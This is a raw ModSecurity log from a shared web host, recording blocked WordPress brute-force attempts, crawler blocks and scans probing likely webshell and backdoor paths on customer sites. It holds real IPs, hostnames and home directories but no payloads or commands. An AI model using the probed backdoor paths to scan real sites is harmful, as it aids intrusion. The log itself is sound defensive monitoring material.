[Tue May 26 14:09:22.635143 2026] [security2:error] [pid 585807:tid 585975] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcOuHp6I37JgAKrHURcQAAAKo"]
[Tue May 26 14:09:22.728516 2026] [security2:error] [pid 585807:tid 586052] [client 172.98.32.37:59421] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 37.32.98.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahVcOuHp6I37JgAKrHUReAAAAPY"]
[Tue May 26 14:09:23.850229 2026] [security2:error] [pid 585807:tid 586006] [client 146.174.176.78:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcO-Hp6I37JgAKrHURkwAAAMk"]
[Tue May 26 14:09:24.101590 2026] [security2:error] [pid 585807:tid 586002] [client 202.141.30.10:35358] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVcPOHp6I37JgAKrHURogAAAMU"]
[Tue May 26 14:09:24.101730 2026] [security2:error] [pid 585807:tid 586002] [client 202.141.30.10:35358] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVcPOHp6I37JgAKrHURogAAAMU"]
[Tue May 26 14:09:24.245313 2026] [security2:error] [pid 585807:tid 585951] [client 31.57.184.107:51114] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahVcPOHp6I37JgAKrHURowAAAJM"]
[Tue May 26 14:09:25.269167 2026] [security2:error] [pid 585807:tid 586062] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcPOHp6I37JgAKrHURtgAAAQA"]
[Tue May 26 14:09:26.320790 2026] [security2:error] [pid 585807:tid 586003] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcPeHp6I37JgAKrHUR2gAAAMY"]
[Tue May 26 14:09:27.827051 2026] [security2:error] [pid 585807:tid 585911] [remote 94.76.235.103:34334] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "koneksi.com.co"] [uri "/wp-login.php"] [unique_id "ahVcP-Hp6I37JgAKrHUSBAAAs2c"]
[Tue May 26 14:09:28.793871 2026] [security2:error] [pid 585807:tid 586058] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcQOHp6I37JgAKrHUSEQAAAPw"]
[Tue May 26 14:09:29.731870 2026] [security2:error] [pid 585807:tid 585898] [remote 95.70.131.179:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.131.70.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVcQeHp6I37JgAKrHUSNwAArlo"]
[Tue May 26 14:09:29.732225 2026] [security2:error] [pid 585807:tid 585979] [client 95.70.131.179:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVcQeHp6I37JgAKrHUSNwAArlo"]
[Tue May 26 14:09:30.325459 2026] [security2:error] [pid 585807:tid 585964] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcQeHp6I37JgAKrHUSPQAAAJ8"]
[Tue May 26 14:09:31.867461 2026] [security2:error] [pid 585807:tid 586014] [client 20.206.67.134:5369] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/wp-plain.php"] [unique_id "ahVcQ-Hp6I37JgAKrHUSeAAAANE"], referer: www.google.com
[Tue May 26 14:09:31.889338 2026] [security2:error] [pid 585807:tid 585952] [client 20.206.67.134:5373] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVcQ-Hp6I37JgAKrHUSegAAAJQ"], referer: www.google.com
[Tue May 26 14:09:32.109371 2026] [security2:error] [pid 585807:tid 586024] [client 114.119.159.61:47207] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "crusties.agsnails.com"] [uri "/ucxcuo/memorial-pickleball-tournament"] [unique_id "ahVcROHp6I37JgAKrHUSfwAAANs"], referer: https://crusties.agsnails.com/ucxcuo/memorial-pickleball-tournament
[Tue May 26 14:09:32.448465 2026] [security2:error] [pid 585807:tid 586043] [client 20.206.67.134:4842] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "dimensioncorporativa.com.co"] [uri "/index.php"] [unique_id "ahVcQ-Hp6I37JgAKrHUSdwAAAO0"], referer: www.google.com
[Tue May 26 14:09:32.784085 2026] [security2:error] [pid 585807:tid 586032] [client 20.206.67.134:5364] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/anrjudwk.php"] [unique_id "ahVcROHp6I37JgAKrHUSmQAAAOM"], referer: www.google.com
[Tue May 26 14:09:32.858415 2026] [security2:error] [pid 585807:tid 585986] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcROHp6I37JgAKrHUSjAAAALU"]
[Tue May 26 14:09:33.094586 2026] [security2:error] [pid 585807:tid 586000] [client 20.206.67.134:4842] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "dimensioncorporativa.com.co"] [uri "/index.php"] [unique_id "ahVcROHp6I37JgAKrHUSoAAAAMM"], referer: www.google.com
[Tue May 26 14:09:35.073557 2026] [security2:error] [pid 585807:tid 585985] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcRuHp6I37JgAKrHUS0wAAALQ"]
[Tue May 26 14:09:35.077465 2026] [security2:error] [pid 585807:tid 586044] [client 202.141.30.10:35346] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVcR-Hp6I37JgAKrHUS4QAAAO4"]
[Tue May 26 14:09:35.079102 2026] [security2:error] [pid 585807:tid 586044] [client 202.141.30.10:35346] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVcR-Hp6I37JgAKrHUS4QAAAO4"]
[Tue May 26 14:09:36.907824 2026] [security2:error] [pid 585807:tid 586041] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcSOHp6I37JgAKrHUTDgAAAOs"]
[Tue May 26 14:09:38.927003 2026] [security2:error] [pid 585807:tid 586049] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcSuHp6I37JgAKrHUTTQAAAPM"]
[Tue May 26 14:09:39.671125 2026] [security2:error] [pid 585807:tid 586040] [client 66.249.64.109:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahVcS-Hp6I37JgAKrHUTcwAAAOo"]
[Tue May 26 14:09:39.671427 2026] [security2:error] [pid 585807:tid 586043] [client 66.249.64.109:61199] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahVcS-Hp6I37JgAKrHUTbQAAAO0"]
[Tue May 26 14:09:40.379427 2026] [security2:error] [pid 585807:tid 586029] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcS-Hp6I37JgAKrHUTfAAAAOA"]
[Tue May 26 14:09:42.250065 2026] [security2:error] [pid 585807:tid 585959] [client 95.70.131.179:63114] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.131.70.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclubmembership.com"] [uri "/xmlrpc.php"] [unique_id "ahVcTuHp6I37JgAKrHUTvQAAAJo"]
[Tue May 26 14:09:42.250174 2026] [security2:error] [pid 585807:tid 585959] [client 95.70.131.179:63114] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "kingsclubmembership.com"] [uri "/xmlrpc.php"] [unique_id "ahVcTuHp6I37JgAKrHUTvQAAAJo"]
[Tue May 26 14:09:42.628264 2026] [security2:error] [pid 585807:tid 585937] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcTuHp6I37JgAKrHUTvAAAAIU"]
[Tue May 26 14:09:44.470020 2026] [security2:error] [pid 585807:tid 585966] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcUOHp6I37JgAKrHUT6gAAAKE"]
[Tue May 26 14:09:46.005335 2026] [security2:error] [pid 585807:tid 586006] [client 202.141.30.10:35576] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVcUuHp6I37JgAKrHUUJAAAAMk"]
[Tue May 26 14:09:46.005821 2026] [security2:error] [pid 585807:tid 586006] [client 202.141.30.10:35576] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVcUuHp6I37JgAKrHUUJAAAAMk"]
[Tue May 26 14:09:46.628907 2026] [security2:error] [pid 585807:tid 585981] [client 20.206.67.134:5349] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/wp-plain.php"] [unique_id "ahVcUuHp6I37JgAKrHUUNwAAALA"], referer: www.google.com
[Tue May 26 14:09:46.871902 2026] [security2:error] [pid 585807:tid 586055] [client 20.206.67.134:5320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVcUuHp6I37JgAKrHUUQgAAAPk"], referer: www.google.com
[Tue May 26 14:09:47.213918 2026] [security2:error] [pid 585807:tid 586060] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcUuHp6I37JgAKrHUUPgAAAP4"]
[Tue May 26 14:09:47.236087 2026] [security2:error] [pid 585807:tid 585964] [client 203.210.172.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcUuHp6I37JgAKrHUUOwAAAJ8"]
[Tue May 26 14:09:47.793872 2026] [security2:error] [pid 585807:tid 585999] [client 20.206.67.134:4832] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahVcU-Hp6I37JgAKrHUUWAAAAMI"]
[Tue May 26 14:09:49.099456 2026] [security2:error] [pid 585807:tid 585854] [remote 152.53.111.131:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 131.111.53.152.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahVcVOHp6I37JgAKrHUUdwAAsC4"]
[Tue May 26 14:09:49.208739 2026] [security2:error] [pid 585807:tid 585841] [remote 40.77.167.35:60363] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 35.167.77.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "virgence.com"] [uri "/index.php/portfolio_page/cardkandu-anaglyph/"] [unique_id "ahVcVeHp6I37JgAKrHUUgQAA0SE"]
[Tue May 26 14:09:49.243569 2026] [security2:error] [pid 585807:tid 585845] [remote 74.7.241.58:55250] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVcVeHp6I37JgAKrHUUggAA0yU"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/vi
[Tue May 26 14:09:49.280779 2026] [security2:error] [pid 585807:tid 586022] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcVOHp6I37JgAKrHUUdgAAANk"]
[Tue May 26 14:09:50.567209 2026] [security2:error] [pid 585807:tid 585991] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcVuHp6I37JgAKrHUUmgAAALo"]
[Tue May 26 14:09:51.703640 2026] [security2:error] [pid 585807:tid 586060] [client 185.191.171.3:64250] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahVcV-Hp6I37JgAKrHUUtAAAAP4"]
[Tue May 26 14:09:51.703795 2026] [security2:error] [pid 585807:tid 586060] [client 185.191.171.3:64250] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahVcV-Hp6I37JgAKrHUUtAAAAP4"]
[Tue May 26 14:09:53.086180 2026] [security2:error] [pid 585807:tid 585977] [client 20.206.67.134:5892] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/mdzlvbgn.php"] [unique_id "ahVcWeHp6I37JgAKrHUU2AAAAKw"], referer: www.google.com
[Tue May 26 14:09:53.580254 2026] [security2:error] [pid 585807:tid 585945] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcWeHp6I37JgAKrHUU2wAAAI0"]
[Tue May 26 14:09:54.044986 2026] [security2:error] [pid 585807:tid 586055] [client 20.206.67.134:1980] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahVcWuHp6I37JgAKrHUU8gAAAPk"]
[Tue May 26 14:09:54.711685 2026] [security2:error] [pid 585807:tid 585991] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcWuHp6I37JgAKrHUVBAAAALo"]
[Tue May 26 14:09:55.804286 2026] [autoindex:error] [pid 585807:tid 585951] [client 66.132.172.96:9544] AH01276: Cannot serve directory /home2/azurm42s/test.azurmediatec.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:09:57.211535 2026] [security2:error] [pid 585807:tid 585980] [client 202.141.30.10:65447] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVcXeHp6I37JgAKrHUVVAAAAK8"]
[Tue May 26 14:09:57.211747 2026] [security2:error] [pid 585807:tid 585980] [client 202.141.30.10:65447] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVcXeHp6I37JgAKrHUVVAAAAK8"]
[Tue May 26 14:09:57.340276 2026] [security2:error] [pid 585807:tid 585956] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcXOHp6I37JgAKrHUVUAAAAJg"]
[Tue May 26 14:09:58.219371 2026] [security2:error] [pid 585807:tid 586016] [client 20.206.67.134:4802] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/wp-content/plugins/apikey/apikey.php.suspected"] [unique_id "ahVcXuHp6I37JgAKrHUVcwAAANM"]
[Tue May 26 14:09:58.243714 2026] [security2:error] [pid 585807:tid 585876] [remote 103.95.119.103:45500] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-login.php"] [unique_id "ahVcXuHp6I37JgAKrHUVbwAAuUQ"]
[Tue May 26 14:09:59.312899 2026] [security2:error] [pid 585807:tid 585980] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcXuHp6I37JgAKrHUVjgAAAK8"]
[Tue May 26 14:10:00.608825 2026] [security2:error] [pid 585807:tid 586022] [client 4.204.220.190:2143] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.preetishah.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVcYOHp6I37JgAKrHUVuwAAANk"]
[Tue May 26 14:10:00.608943 2026] [security2:error] [pid 585807:tid 586022] [client 4.204.220.190:2143] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.preetishah.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVcYOHp6I37JgAKrHUVuwAAANk"]
[Tue May 26 14:10:00.751943 2026] [security2:error] [pid 585807:tid 585943] [client 4.204.220.190:2182] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.preetishah.com"] [uri "/about.php"] [unique_id "ahVcYOHp6I37JgAKrHUVxwAAAIs"]
[Tue May 26 14:10:00.752081 2026] [security2:error] [pid 585807:tid 585943] [client 4.204.220.190:2182] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.preetishah.com"] [uri "/about.php"] [unique_id "ahVcYOHp6I37JgAKrHUVxwAAAIs"]
[Tue May 26 14:10:01.308877 2026] [security2:error] [pid 585807:tid 586018] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcYOHp6I37JgAKrHUVzQAAANU"]
[Tue May 26 14:10:02.870615 2026] [security2:error] [pid 585807:tid 586052] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcYuHp6I37JgAKrHUV_QAAAPY"]
